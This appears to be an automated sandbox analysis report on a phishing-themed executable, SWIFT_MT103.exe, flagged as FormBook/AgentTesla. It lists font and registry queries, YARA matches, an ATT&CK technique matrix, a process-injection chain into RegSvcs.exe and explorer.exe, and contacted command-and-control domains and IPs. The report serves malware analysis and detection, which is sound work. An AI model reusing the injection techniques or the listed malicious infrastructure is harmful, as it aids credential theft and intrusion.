          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SWIFT_MT103.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.357804367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301061394.0000000003A29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358391118.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.465035906.0000000000250000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467645501.0000000004190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.467412388.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.358413416.0000000001130000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection712Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458843 Sample: SWIFT_MT103.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 31 www.josiemaxwrites.com 2->31 33 www.fayansistanbul.com 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 10 other signatures 2->47 11 SWIFT_MT103.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\SWIFT_MT103.exe.log, ASCII 11->29 dropped 57 Writes to foreign memory regions 11->57 59 Injects a PE file into a foreign processes 11->59 15 RegSvcs.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 2 other signatures 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 webacc3.sd6.ghst.net 155.133.142.5, 49744, 80 GANDI-AS-2Domainnameregistrar-httpwwwgandinetFR France 18->35 37 www.garagekuhn.com 18->37 39 www.bodymoisturizer.online 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SWIFT_MT103.exe37%MetadefenderBrowse
          SWIFT_MT103.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          SWIFT_MT103.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          11.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/D0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cno0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/_0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comgrita0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
          http://www.fontbureau.comasv0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          https://www.fayansistanbul.com/q4kr/?4h_4=eOXhpEoLIa7YYnf6/8HRqFDyW0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
          http://www.fontbureau.comR.TTFr0%Avira URL Cloudsafe
          http://www.fontbureau.comV0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/r0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/D0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.fontbureau.comi0%Avira URL Cloudsafe
          www.bodymoisturizer.online/q4kr/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/o40%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fontbureau.comt0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/h0%URL Reputationsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/vnoi0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/_0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.josiemaxwrites.com
          		199.34.228.67
          		truefalse
            		unknown
            webacc3.sd6.ghst.net
            		155.133.142.5
            		truetrue
              		unknown
              www.fayansistanbul.com
              		172.67.130.233
              		truefalse
                		unknown
                www.bodymoisturizer.online
                		unknown
                		unknowntrue
                  		unknown
                  www.garagekuhn.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    www.bodymoisturizer.online/q4kr/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/jp/DSWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers?SWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnoSWIFT_MT103.exe, 00000000.00000003.204967901.0000000005914000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/_SWIFT_MT103.exe, 00000000.00000003.207158126.0000000005916000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comgritaSWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/3SWIFT_MT103.exe, 00000000.00000003.206691885.0000000005916000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comasvSWIFT_MT103.exe, 00000000.00000003.288558730.0000000005910000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp//SWIFT_MT103.exe, 00000000.00000003.206953988.0000000005916000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseSWIFT_MT103.exe, 00000000.00000002.307800157.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.324311407.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
